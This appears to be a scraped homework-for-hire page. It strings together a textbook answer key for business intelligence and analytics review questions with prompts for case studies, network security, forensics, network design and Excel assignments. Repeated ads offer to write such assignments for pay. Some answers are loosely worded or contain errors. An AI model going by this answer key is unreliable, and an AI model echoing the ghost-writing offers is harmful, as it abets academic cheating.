A data warehouse, introduced in Section 1.7, is the component of a BI system that contains the source data. As described in this section, developing a data warehouse usually includes development of the data infrastructure for descriptive analytics—that is, consolidation of data sources and making relevant data available in a form that enables appropriate reporting and analysis. A data warehouse serves as the basis for developing appropriate reports, queries, alerts, and trends.

5. What is predictive analytics? How can organizations employ predictive analytics?

Predictive analytics is the use of statistical techniques and data mining to determine what is likely to happen in the future. Businesses use predictive analytics to forecast whether customers are likely to switch to a competitor, what customers are likely to buy, how likely customers are to respond to a promotion, and whether a customer is creditworthy. Sports teams have used predictive analytics to identify the players most likely to contribute to a team’s success.

6. What is prescriptive analytics? What kind of problems can be solved by prescriptive analytics?

Prescriptive analytics is a set of techniques that use descriptive data and forecasts to identify the decisions most likely to result in the best performance. Usually, an organization uses prescriptive analytics to identify the decisions or actions that will optimize the performance of a system. Organizations have used prescriptive analytics to set prices, create production plans, and identify the best locations for facilities such as bank branches.

7. Define modeling from the analytics perspective.

As Application Case 1.6 illustrates, analytics uses descriptive data to create models of how people, equipment, or other variables operate in the real world. These models can be used in predictive and prescriptive analytics to develop forecasts, recommendations, and decisions.

8. Is it a good idea to follow a hierarchy of descriptive and predictive analytics before applying prescriptive analytics?

As noted in the analysis of Application Case 1.5, it is important in any analytics project to understand the business domain and current state of the business problem. This requires analysis of historical data, or descriptive analytics. Although the chapter does not discuss a hierarchy of analytics, students may observe that testing a model with predictive analytics could logically improve prescriptive use of the model.

9. How can analytics aid in objective decision making?

As noted in the analysis of Application Case 1.4, problem solving in organizations has tended to be subjective, and decision makers tend to rely on familiar processes. The result is that future decisions are no better than past decisions. Analytics builds on historical data and takes into account changing conditions to arrive at fact-based solutions that decision makers might not have considered.

10. What is Big Data analytics?

The term Big Data refers to data that cannot be stored in a single storage unit. Typically, the data is arriving in many different forms, be they structured, unstructured, or in a stream. Big Data analytics is analytics on a large enough scale, with fast enough processing, to handle this kind of data.

11. What are the sources of Big Data?

Major sources include clickstreams from Web sites, postings on social media, and data from traffic, sensors, and the weather.

12. What are the characteristics of Big Data?

Today Big Data refers to almost any kind of large data that has the characteristics of volume, velocity, and variety. Examples include data about Web searches, such as the billions of Web pages searched by Google; data about financial trading, which operates in the order of microseconds; and data about consumer opinions measured from postings in social media.

13. What processing technique is applied to process Big Data?

One computer, even a powerful one, could not handle the scale of Big Data. The solution is to push computation to the data, using the MapReduce programming paradigm.

Section 1.6 Review Questions

1. What are three factors that might be part of a PM for season ticket renewals?

Examples might include ticket cost, marketing and team success.

2. What are two techniques that football teams can use to do opponent analysis?

Examples might include frequency of running plays and individual athlete trends and matchups.

3. What other analytics uses can you envision in sports?

Many examples exist including maintenance of facilities and accuracy of referees.

4. Why would a health insurance company invest in analytics beyond fraud detection? Why is it in its best interest to predict the likelihood of falls by patients?

There are many possible applications, for example insurance companies may want to evaluate causes for conditions so that those conditions can be avoided. An excellent example of this is patient falls. Having this information allows for preventive measures to be taken before a fall occurs.

5. What other applications similar to prediction of falls can you envision?

Student responses will vary that may include prediction of other conditions such as cancer.

6. How would you convince a new health insurance customer to adopt healthier lifestyles (Humana Example 3)?

Data can be used to demonstrate to a customer that adoption of a healthier lifestyle may limit the negative experiences associated with various conditions or diseases.

7. Identify at least three other opportunities for applying analytics in the retail value chain beyond those covered in this section.

Student responses will vary.

8. Which retail stores that you know of employ some of the analytics applications identified in this section?

Student responses will vary.

9. What is a common thread in the examples discussed in image analytics?

In each analysis a detailed understanding of both the image data and other supplementary data sources were used to create solutions.

10. Can you think of other applications using satellite data along the lines presented in this section?

Student responses will vary.

Section 1.7 Review Questions

1. What are the major characteristics of AI?

• Technology that can learn to do things better over time.

• Technology that can understand human language.

• Technology that can answer questions.

2. List the major benefits of AI.

• Significant reduction in the cost of performing work. This reduction continues over time while the cost of doing the same work manually increases with time.

• Work can be performed much faster.

• Work is consistent in general, more consistent than human work.

• Increased productivity and profitability as well as a competitive advantage are the major drivers of AI.

3. What are the major groups in the ecosystem of AI? List the major contents of each.

· Major Technologies include machine learning, deep learning and intelligent agents.

· Knowledge-based technologies include expert systems, recommendation engines, chat bots, virtual personal assistants and robo advisors.

· Biometric related technologies include natural language processing and other biometric recognition technologies

· support theories, tools and platforms include a variety of disciplines such as computer science, cognitive science, control theory, linguistics, mathematics, neuroscience, philosophy, psychology, and statistics.

· Tools and platforms include the various software applications and systems available from a wide number of vendors.

4. Why is machine learning so important?

Machine learning presents the promise of creating more effective and accurate solutions to problems without the direct intervention of individuals.

5. Differentiate between narrow and general AI.

Narrow AI focuses on a specific, defined domain whereas general AI may cross multiple domains and become more powerful as it is refined.

6. Some say that no AI application is strong. Why?

No AI currently performs the full range of human cognitive capabilities.

7. Define assisted intelligence, augmented intelligence, and autonomous intelligence.

· Assisted intelligence is the equivalent of week AI and works within narrow domains.

· Augmented intelligence use computer abilities to extend human cognitive abilities.

· Automated intelligence perform a broad range of functions without human intervention.

8. What is the difference between traditional AI and augmented intelligence?

These systems are designed to extend human capabilities as opposed to replacing them.

9. Relate types of AI to cognitive computing.

Not addressed in this chapter, but students may note that both can be designed to perform tasks.

10. List five major AI applications for increasing the food supply.

Examples include increasing productivity of farm equipment, improved planting and harvesting, improving food nutrition, reducing the cost of food processing, driverless machines, picking fruits and vegetables, pest control improvements and weather monitoring.

11. List five contributions of AI in medical care.

Examples include disease prediction, tracking medication intake, telepresence, improved diagnostics, more efficient supply chains, personal diagnoses, providing medical information and others.

Section 1.8 Review Questions

1. What are the major benefits of intelligent systems convergences?

This convergence allows for a greater number of overall features and applications to more complex problems as multiple systems can be combined.

2. Why did analytics initiatives fail at such a high rate in the past?

Responses will vary but may focus on a lack of availability of data, lack of processing tools and complexity of the required analysis.

3. What synergy can be created by combining AI and analytics?

AI may be used to automatically locate, visualize and narrate important items and can be used to create predictions that can be compared to actual performance. These activities will free up time for more analytics.

4. Why is Big Data preparation essential for AI initiatives?

AI works best when it has access to robust data sources. Properly preparing big data for use in AI allows data to be used completely and effectively.

5. What are the benefits of adding IoT to intelligent technology applications?

The primary benefit is the inclusion of additional data that can be used for various types of analysis.

6. Why it is recommended to use blockchain in support of intelligent applications? The use of block chain technology can add security to data in a distributed network.

Section 1.9 Review Questions

(This section has no review questions.)

Section 1.10 Review Questions

(This section has no review questions.)

ANSWERS TO APPLICATION CASE QUESTIONS FOR DISCUSSION( (

Application Case 1.1: Making Elevators Go Faster!

1. Why this is an example relevant to decision making?

This is an example of how the symptoms may not directly reveal the problem (perceived versus actual wait time being the issue).

2. Relate this situation to the intelligence phase of decision making.

This situation demonstrates how the intelligence phase of decision-making is important because detailed problem identification is necessary in order to create a satisfactory solution.

Application Case 1.2: SNAP DSS Helps OneNet Make Telecommunications Rate Decision

(No questions in this case)

Application Case 1.3: Silvaris Increases Business with Visual Analysis and Real-Time Reporting Capabilities

1. What was the challenge faced by Silvaris?

Material prices changed rapidly and it was necessary to receive a real-time view of data without moving that data to a separate reporting format.

2. How did Silvaris solve its problem using data visualization with Tableau?

Tableau allow the company to easily connect and visualize live data and create dashboards for reporting purposes.

Application Case 1.4: Siemens Reduces Cost with the Use of Data Visualization

1. What challenges were faced by Siemens visual analytics group?

The group needed to provide a wide range of reports for different organizational needs while maintaining consistency and self-service ability.

2. How did the data visualization tool Dundas BI help Siemens in reducing cost?

The system allowed them to create highly interactive dashboards that enabled early detection of issues.

Application Case 1.5: Analyzing Athletic Injuries

1. What types of analytics are applied in the injury analysis?

In this example both reporting and predictive analysis were included.

2. How do visualizations aid in understanding the data and delivering insights into the data?

These visualizations made understanding and depicting the information easier by displaying healing time based on position, severity of injury or injuries healing time treatment offered in the associated healing time etc.

3. What is a classification problem?

An issue that occurs in this case when the type of healing category is incorrectly identified, leading to an incorrect prediction of healing time.

4. What can be derived by performing sequence analysis?

Student responses may vary, but in this example it may be possible to predict how one injury may result in other injuries later.

Application Case 1.6: A Specialty Steel Bar Company Uses Analytics to Determine Available-to-Promise Date

1. Why would reallocation of inventory from one customer to another be a major issue for discussion?

This action may require a discount to the first customer or may result in the delay that may jeopardize the customer relationship.

2. How could a DSS help make these decisions?

A DSS system would provide greater visibility into actual inventories, expected inventories and potential customer implications of reallocation of inventory.

Application Case 1.7: A Specialty Steel Bar Company Uses Analytics to Determine Available-to-Promise Date

1. What is the purpose of knowing how much ground is covered by green foliage on a farm? In a forest?

In a farm setting, this may indicate the level of plant growth. In a forest setting, this may provide details on how the forest is evolving.

2. Why would image analysis of foliage through an app be better than a visual check?

It will provide a more consistent quantitative estimate than individual qualitative perceptions of growth.

3. Explore research papers to understand the underlying algorithmic logic of image analysis. What did you learn?

Student research and responses will vary. Results may indicate that there are different methods of analysis and that this is a rapidly changing field.

4. What other applications of image analysis can you think of?

Student responses will vary.

Application Case 1.8: AI Increases Passengers’ Comfort and Security in Airports and Borders

1. List the benefits of AI devices to travelers.

Benefits will include faster processes such as recognition, more accurate processes and providing additional services.

2. List the benefits to governments and airline companies.

Benefits will include more accurate, faster and more cost efficient services being provided.

3. Relate this case to machine vision and other AI tools that deal with people’s biometrics

This case provides an example of how machine vision and other AI tools can be used as a part of biometric recognition systems that more quickly and accurately identify individuals as they enter an airport.

Application Case 1.9: Robots Took the Job of Camel-Racing Jockeys for Societal Benefits

1. It is said that the robots eradicated the child slavery. Explain.

This is because robots have replaced children who in the past may have been kidnapped to act as jockeys.

2. Why do the owners need to drive by their camels while they are racing?

This is necessary for the camels to react and run. Additionally owners can vary their interaction with the camel based on how the camel is performing in comparison to the others in the race.

3. Why not duplicate the technology for horse racing?

Student opinions and responses will vary, but may focus on the lack of child slavery in Western horseracing.

4. Summarize ethical aspects of this case (Read Boddington, 2017). Do this exercise after you have read about ethics in Chapter 14.

Student responses will vary.

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Case Study Question From From Pages 433 And 465-467

Note: –  Must require——–

APA format (Times New Roman, size 12 and 2 space)

MS Visio diagram OR MS Word Smart Art

Minimum 3 or more References including Sharda(Below)

W5: Case Studies

Graded Assignment:  Case Studies – (Follow all steps below)

Carefully review and read both case studies found in your textbook from Pages 433 and 465-467

Sharda, R., Delen, D., & Turban, E. (2015) Business intelligence and analytics: Systems for decision support (10th ed.). Boston: Pearson.

Digital: ISBN-13: 978-0-13-340193-6 or Print: ISBN-13: 978-0-13-305090-5

When concluding the paper, expand your analytical and critical thinking skills to develop ideas as a process or operation of steps visually represented in a flow diagram or any other type of created illustration to support your idea which can be used as a proposal to the entity or organization in the cases to correct or improve any case related issues addressed.  This is required for both cases.

When developing illustrations to support a process or operation of steps, Microsoft Word has a tool known as “Smart Art” which is ideal for the development of these types of illustrations or diagrams.  To get acquainted with this tool, everyone can visit www.youtube.com using a keyword search “Microsoft Word Smart Art Tutorials” to find many video demonstrations in using this tool.

QUESTIONS FOR THE END-OF-CHAPTER from Page# 433

APPLICATION CASE

1. What were the main challenges encountered by CARE International before they created their warehouse prepositioning model?

2. How does the objective function relate to the organization’s need to improve relief services to affected areas?

3. Conduct online research and suggest at least three other applications or types of software that could handle the magnitude of variable and constraints CARE International used in their MIP model.

4. Elaborate on some benefits CARE International stands to gain from implementing their pre-positioning model on a large scale in future.

QUESTIONS FOR THE END-OF-CHAPTER (Page NO#465-467)

APPLICATION CASE 

1. Describe the problem that a large company such as HP might face in offering many product lines and options.

2. Why is there a possible conflict between marketing and operations?

3. Summarize your understanding of the models and the algorithms.

4. Perform an online search to find more details of the algorithms.

5. Why would there be a need for such a system in an organization?

6. What benefits did HP derive from implementation of the models?

Conclusion

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Case Project 9-1

Case Project 9-1: DoS attacks are one of the easier attacks to perpetrate on a network, so

They’re often used by people who have a grudge against a company or are

out to commit acts of vandalism. To read about some well-known DoS

attacks, go to www.grc.com/freepopular.htm and look for the Original DDoS

Report, which discusses an attack perpetrated on that Web site by a 13-

year-old. Read the report and write a synopsis of how the attack was carried

out and what could have been done to prevent it.

1.      What’s the largest attack volume (in Gbps) as of the papers writing?

2.      What percentage of companies were hit by a DDos attack in 2013?

3.      What’s the trend for the current method attackers use to perpetrate DDos attacks?

4.       Using the chart on page 7 of the report, what’s the trend for the type of attacks being perpetrated?

Case Project 9-2: Using the information on open ports you found with NetInfo in Hands-On Project 9-5, research these ports to determine their function and whether leaving them open is safe. A Google search is a good place to begin your research. Write a summary of what you found and list which open ports pose a security risk.

 

Case Project 9-3: Search for security policy templates on the Internet. A good place to start is the

SANS Institute (www.sans.org). Using one or more of the templates you find,

develop a security policy for your school or a business.

 

Case Project 9-4: A small research company in Pittsburgh is working to develop a new method of mass storage to replace current hard drive technology. Four engineers and an office manager work there the engineers are highly skilled professionals, and the office manager is a capable computer user. The company has a high-bandwidth Internet connection because employees must conduct research frequently. The employees have hopes of making a breakthrough and bringing the company public within the next two years. You’ve been hired as a security consultant to assess the company’s needs.  Write a paper recommending what type of security policy should be used (open, moderately restrictive, or high restrictive) and what security technologies should be used. On what areas should the security policy focus (physical security, data security, auditing, passwords, and so forth), and what technologies should be used to secure these areas?

 

Case Project 9-5: An architectural firm of eight employees, each with a networked desktop computer, wants you to develop a security policy for the company. Management

has emphasized that ease of use is paramount, and little time is available for

training. Working in small groups, each group should write a list of questions

aimed at getting enough information for developing the policy. After determining

the questions, each group should interview another group, with the other

group posing as the architectural firm and answering the list of questions.

What level of security should the policy reflect? Use one of the templates you

found in Case Project 9-3 to develop a policy based on the answers the other

group supplies.

 

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Excel Independent Project 6-5

Classic Gardens and Landscapes counts responses to specialty promotions to determine effectiveness. You use SUMIFS and an IFS formula to complete the summary. You also calculate insurance statistics and display full names in one cell.

[Student Learning Outcomes 6.1, 6.2, 6.3, 6.6, 6.7]

File Needed: ClassicGardens-06.xlsx (Available from the Start File link.)

Completed Project File Name: [your name]-ClassicGardens-06.xlsx

Skills Covered in This Project

  • Nest MATCH and INDEX functions.
  • Create DSUM formulas.
  • Build an IFS function.
  • Build SUMIFS formulas.
  • Use TEXTJOIN to join labels.
  1. Open the ClassicGardens-06 start file. The file will be renamed automatically to include your name. Change the project file name if directed to do so by your instructor, and save it.
  2. Create a nested INDEX and MATCH function to display the number of responses from a city.
    1. Click the Mailings sheet tab and select and name cells A3:D28 as Responses.
    2. Click the Mailing Stats sheet tab.
    3. Click cell B21 and type Carthage.
    4. Click cell C21, start an INDEX function, and select the first argument list option.
    5. Choose or type the Responses range name for the Array argument.
    6. Click the Row_num box and nest a MATCH function. Select cell B21 for the Lookup_value and cells A3:A28 on the Mailings sheet for the Lookup_array. Click the Match_type argument box and type 0.
    7. Click INDEX in the Formula bar. Click the Column_num box and nest a second MATCH function to look up cell D3 on the Mailings sheet in the lookup array A3:D3.
    8. Click the Match_type box and type 0 (Figure 6-106) and click OK. The result displays as 343.00.MATCH statements are the row_num and col_num arguments.Figure 6-106 Nested MATCH and INDEX functions
    9. Format the results to show zero decimal places.
    10. Type Smyrna in cell B21.
  3. Use DSUM to summarize mailing data.
    1. Select the Mailings sheet and note that number mailed is located in the third column and response data is in the fourth column.
    2. Click the Criteria sheet tab. Select cell B2 and type lan* to select data for the Landscape Design department.
    3. Type law* in cell B5 for the Lawn & Maintenance department.
    4. Type pat* in cell B8 for the Patio & Furniture department.
    5. Click the Mailing Stats sheet tab and select cell B7.
    6. Use DSUM with the range name Responses as the Database argument. Type 3 for the Field argument (# Mailed column), and enter an absolute reference to cells B1:B2 on the Criteria sheet as the Criteria argument.
    7. Copy the formula to cell C7 and edit the Field argument to use the fourth column (# Responses).
    8. Use DSUM in cells B8:C9 to calculate results for the two remaining departments.
  4. Use SUM in cells B10:C10.
  5. Format all values as Comma Style with no decimal places.
  6. Create an IFS function to display a response rating. Note: If your version of Excel does not include the IFS function, build the following nested IF function =IF(C7/B7>=20%,$C$15,IF(C7/B7>=15%,$C$16,IF(C7/B7>=11%,$C$17,$C$18))) to display the rating.
    1. Click cell D7. The response rate and ratings are shown in rows 14:18.
    2. Start an IFS function and select C7 for the Logical_test1 argument. Type / for division and select cell B7. Type >=20% to complete the test.
    3. Click the Value_if_true1 box, select C15, and press F4 (FN+F4) (Figure 6-107).Each logical_test argument has a corresponding value_if_true argument.Figure 6-107 First Logical_test and Value_if_true arguments
    4. Click the Logical_test2 box, select C7, type /, select cell B7, and type >=15%.
    5. Click the Value_if_true2 box, click cell C16, and press F4 (FN+F4).
    6. Complete the third and fourth logical tests and Value_if_true arguments (Figure 6-108).Several arguments are scrolled out of viewFigure 6-108 Completed IFS function arguments
    7. Copy the formula in cell D7 to cells D8:D10.
  7. Use SUMIFS to total insurance claims and dependents by city and department.
    1. Click the Employee Insurance sheet tab and select cell E25.
    2. Use SUMIFS with an absolute reference to cells F4:F23 as the Sum_range argument.
    3. The Criteria_range1 argument is an absolute reference to cells E4:E23. The Criteria1 argument is bre* to select the city of Brentwood.
    4. The Criteria_range2 argument is an absolute reference to cells D4:D23, the department column, with criteria of lan* to select the Landscape Design department.
    5. Click OK. The result for cell E25 is 10.
    6. Build SUMIFS formulas for cells E26:E28 based on the criteria displayed in cells C26:C28.
    7. Format borders to remove inconsistencies, if any, and adjust column widths to display data.
  8. Use TEXTJOIN to display names. Note: If your version of Excel does not include the TEXTJOIN function, use CONCAT or CONCATENATE to build the function.
    1. Click the Full Names sheet tab and select cell E4.
    2. Start a TEXTJOIN function and press Spacebar for the Delimiter argument.
    3. Click the Text1 box and select cell C4.
    4. Complete the Text2 and Text3 arguments to show middle and last names and click OK (Figure 6-109).The quotation marks display when you move to the next entry box in the list.Figure 6-109 Delimiter is a space
    5. Copy the formula to display full names in column E.
  9. Save and close the ClassicGardens-06 Excel workbook (Figure 6-110).Completed worksheets for Excel 6-5
 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Network Design/ For Martin Writer

You will select an organization, and apply your research to the analysis and development of a network design that would be appropriate for the organization and the needs that it has for its network. Additional information and the deliverables for each Individual Project will be provided in the assignment description for the project. This is the course’s Key Assignment that you will make contributions to each week.

Project Selection:

The first step will be to select an organization as the target for your network design and architecture proposal document. This organization will be used as the basis for each of the assignments throughout the course and should conform to the following guidelines:

· Nontrivial: The selected organization should be large enough to allow reasonable exercise of the network design process.

· Domain Knowledge: You should be familiar enough with the organization to allow for focus on the project’s tasks without the significant time required for domain education.

· Accessibility: You should have good access to the people and other information related to the organization because this will be an important part of the process.

The selected organization may already have a distributed network in place, but it can still be used as the basis for the projects in this course.

The selected organization must have a need for some kind of distributed network computing as part of their operations. Therefore, you may identify a hypothetical organization that meets these requirements. Any necessary assumptions may be made to fulfill the requirements of organization selection process.

Select an existing organization, or identify a hypothetical organization that fits these requirements, and submit your proposal to your instructor before proceeding with the assignments in the course. Approval should be sought within the first several days of the course. Your instructor will tell you how to submit this proposal and what notification will be given for project approval.

Assignment:

For the assignments in this course, you will not be implementing a distributed network, but you will be developing a comprehensive network design and architecture proposal document. Your first task in this process will be to select an organization or identify a hypothetical organization to use as the basis of your project. You will also create the shell document for the final project deliverable that you will be working on during each unit. As you proceed through each project phase, you will add content to each section of the final document to gradually complete the final project deliverable. Appropriate research should be conducted to support the development of your proposal document, and assumptions may be made when necessary.

The project deliverables are as follows:

· Submit the organization proposal to your instructor for approval.

· Submit the network design and architecture proposal document shell

· Use Word

· Title page

· Course number and name

· Project name

· Student name

· Date

· Table of contents

· Use autogenerated TOC

· Separate page

· Maximum of 3 levels deep

· Be sure to update the fields of the TOC so it is up-to-date before submitting your project.

· Section headings (create each heading on a new page with TBD as content except for sections listed under new content below)

· Project Outline

· Distributed Network Requirements Analysis

· Communication Protocols Analysis and Recommendations

· Network Traffic Analysis and Recommendations

· Network Design and Architecture

· Future Needs Analysis and Recommendations

 

PART I (4 pages)

Project outline and requirements

· Brief description of the organization (can be hypothetical) where the network will be implemented

· Include company size, location(s), and other pertinent information.

· Summary of the benefits that the company would realize through distributed networking

· Material can be taken from the approved proposal that was submitted to the instructor.

· Ensure that this project is approved by the instructor.

Distributed network requirements analysis

· Describe at least 5 major areas of functionality needed by the organization that can be provided through distributed networking.

· For each area of functionality, include information to identify capacity and performance requirements.

· Identify connectivity and security requirements for the proposed network.

· Include any other requirements that will affect your design and architecture, such as the use of existing network infrastructure, budget limitations, existing applications and operating systems, and so forth.

Name the document yourname_CS635_IP1.doc.

PART II (3 pages)

The Communication Protocols Analysis and Recommendations section should include the following:

Analysis:

· For each of the requirements identified in the Requirements Analysis section of the previously created proposal, list and describe the communication protocol(s) that are necessary to support the requirement.

· Include a description of which parts of the network and network applications would utilize the protocol(s).

Recommendations:

· Based on the analysis that was performed in the previous step, prepare a recommendation for protocol(s) to use with the network.

· Justify the selection of these protocol(s) by using a description of the operational characteristics that best match the analysis results.

Be sure to update your table of contents before submission.

Name the document yourname_CS635_IP2.doc.

PART III (3 pages)

Update the network design and architecture proposal document title page with new date and project name.

Update the previously completed sections based on instructor feedback.

Network Traffic Analysis and Recommendations section:

Analysis:

· Summarize each of the major uses of the distributed network.

· For each use, identify the traffic estimates.

· Include an analysis of peak traffic times and levels.

· Identify any other issues that will produce congestion on the network.

Recommendations:

· Based on the analysis that you performed in the previous step, prepare a recommendation of the software and infrastructure that would be required to handle the projected traffic.

· Offer recommendations for software that can be used to manage potential network congestion, and describe how the software works.

Update your table of contents before submission.

Name the document yourname_CS635_IP3.doc.

PART IV (3 pages)

Update the network design and architecture proposal document’s title page with new date and project name.

Update the previously completed sections based on instructor feedback.

The Network Design and Architecture section should include the following:

Infrastructure:

· Describe the network architecture that is suitable for this distributed network.

· Include at least 1 visual model of the system that identifies the major components.

· Justify the physical design of the system with reference to the requirements established in previous sections of the proposal.

· Summarize the estimated cost of the network infrastructure.

Software:

· Describe the software required for the network.

· Include the operating systems and other software applications that are required to meet the functional and operational requirements established in previous sections of the proposal.

· Summarize the estimated cost of the network software.

Name the document yourname_CS635_IP4.doc.

PART V (3 pages)

Update the network design and architecture proposal title page with new date and project name.

Update the previously completed sections based on instructor feedback.

The Future Needs Analysis and Recommendations section should include the following:

· Research current and future trends in distributed networking.

· Summarize at least three potential changes in distributed networking that might affect your company.

· Provide a modified design and architecture, and discuss the changes from the original design proposal that would be required to support the new requirements.

Network design and architecture proposal

· Review the entire document for any changes and improvements you would like to make.

· Ensure this final version of the plan is sufficiently detailed to allow the organization to confidently move forward with a distributed network implementation that is based on your recommendations.

Any previous instructor feedback should be addressed with appropriate changes.

Update your table of contents before submission.

Name the document “yourname_CS635_IP5.doc.”

Each part at least 2 REFERENCES + Citation, Please don’t use wiki not allow us to use it.

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Forensic Report

TASK

Task 1: Recovering scrambled bits (5%) (5 marks)

For this task I will upload a text file with scrambled bits on the subject interact2 site closer to the assignment due date. You will be required to restore the scrambled bits to their original order and copy the plain text in your assignment.

Deliverable: Describe the process used in restoring the scrambled bits and insert plain text in the assignment.

Task 2: Digital Forensics Report (20%) (20 marks)

In this major task you are asked to prepare a digital forensic report for the following scenario after carefully reading the scenario and looking at textbook figures as referred below: You are investigating a possible intellectual property theft by a new employee of Superior Bicycles, Inc. This employee, Tom Johnson, is the cousin of Jim Shu, an employee who had been terminated. Bob Aspen is an external contractor and investor who gets a strange e mail from Terry Sadler about Jim Shu’s new project (shown in Figure 8-5 of the textbook on p. 350).

Bob forwards the e-mail to Chris Robinson (the president of Superior Bicycles) to inquire about any special projects that might need capital investments. Chris forwards the e-mail to the general counsel, Ralph Benson, asking him to look into it. He also forwards it to Bob Swartz, asking him to have IT look for any e-mails with attachments. After a little investigation, Bob Swartz forwards an e-mail IT found to Chris Robinson (shown in Figure 8 – 6 of the textbook on p. 350).

Chris also found a USB drive on the desk Tom Johnson was assigned to. Your task is to search for and determine whether the drive contains any proprietary Superior Bicycles, Inc. data in the form of any digital photograph as an evidence. In particular, you may look for graphic files such as JPEG on the USB drive hidden with different format. Note for the USB drive image, you need to download the “C08InChp.exe” file from the download section of Chapter 8 on the student companion site of the textbook (Nelson, Phillips, & Steuart, 6/e, 2019).

Your task is to search all possible places data might be hidden (e-mails and USB drive) and recover and present any digital evidence in the report.

Deliverable: For this forensic examination, you need to provide a report of 1800-2000 words (approximately 5 A4 pages) in the format described in presentation section below.

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Exp19_Excel_Ch05_CapAssessment_Travel

You are the manager of an information technology (IT) team. Your employees go to training workshops and national conferences to keep up-to-date in the field. You created a list of expenses by category for each employee for the last six months. Now you want to subtotal the data to review total costs by employee and then create a PivotTable to look at the data from different perspectives.

Steps to Perform:

 

Step

Instructions

Points Possible

 

1

Start Excel. Download and open the file named Exp19_Excel_Ch05_CapAssessment_Travel.xlsx.   Grader has automatically added your last name to the beginning of the   filename.

0

 

2

Before using the Subtotal   command, you must first sort the data.
On the Subtotals worksheet, sort the data by Employee and further sort by   Category, both in alphabetical order.

4

 

3

You want to subtotal the data to calculate expenses by   employee.
Use the Subtotals feature to insert subtotal rows by Employee to calculate   the total expense by employee.

6

 

4

Now you want to hide the details   for two employees and focus on details for the remaining employees.
Collapse the Davidson and Miller sections to show only their totals. Leave   the other employees’ individual rows displayed.

5

 

5

For more detailed analysis, you are ready to create a   PivotTable.
Use the Expenses worksheet to create a blank PivotTable on a new worksheet   named Summary.   Name the PivotTable Categories.

8

 

6

You want to include the Category   and Expense fields in the PivotTable.
Use the Category and Expense fields, enabling Excel to determine where the   fields go in the PivotTable.

5

 

7

You want to display average expenses instead of totals.
Modify the Values field to determine the average expense by category. Change   the custom name to Average Expense.

4

 

8

Format the Values field with   Accounting number type.

4

 

9

You want to display a meaningful label and select a   different layout.
Type Category   in cell A3 and change the Grand Totals layout option to On for Rows Only.

5

 

10

Apply Light Blue, Pivot Style   Dark 2 and display banded rows.

5

 

11

To make it easy to filter the PivotTable results, you will   insert and format a slicer.
Insert a slicer for the Employee field, change the slicer height to 2   inches and apply the Light Blue, Slicer Style Dark 5. Move the slicer so that   the upper-left corner is in cell A10.

6

 

12

You want to insert another   PivotTable to analyze the data on the Expenses worksheet.
Use the Expenses worksheet to create another blank PivotTable on a sheet   named Totals.   Name the PivotTable Employees. Add the Employee to the Rows and   add the Expense field to the Values area. Sort the PivotTable from largest to   smallest expense.

10

 

13

Change the name for the Expenses column to Totals   and format the field with Accounting number format.

6

 

14

Insert a calculated field to   subtract 2659.72   from the Totals field. Change the custom name to Above or Below Average and   apply Accounting number format to the field.

10

 

15

Set 10.86 (approximate) as the width for column   B and 13.71   for column C, change the row height of row 3 to 30, and apply word wrap to   cell C3.

4

 

16

Now, you want to create a   PivotChart to depict the data visually.
Create a clustered column PivotChart from the PivotTable. Move the PivotChart   to a new sheet named Chart. Hide all field buttons in the   PivotChart, if necessary.

8

 

17

Add a chart title above the chart and type Expenses by   Employee. Change the chart style to Style 14.

2

 

18

Apply 11 pt font size to the   value axis and display the axis as Accounting with zero decimal places.

4

 

19

Create a footer on all worksheets with your name in the   left section, the sheet name code in the center section, and the file name   code in the right section.

4

 

20

Ensure that the worksheets are   correctly named and placed in the following order in the workbook: Subtotals,   Summary, Chart, Totals, Expenses.

0

 

21

Save and close Exp19_Excel_Ch05_CapAssessment_Travel.xlsx.   Exit Excel. Submit the file as directed.

0

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!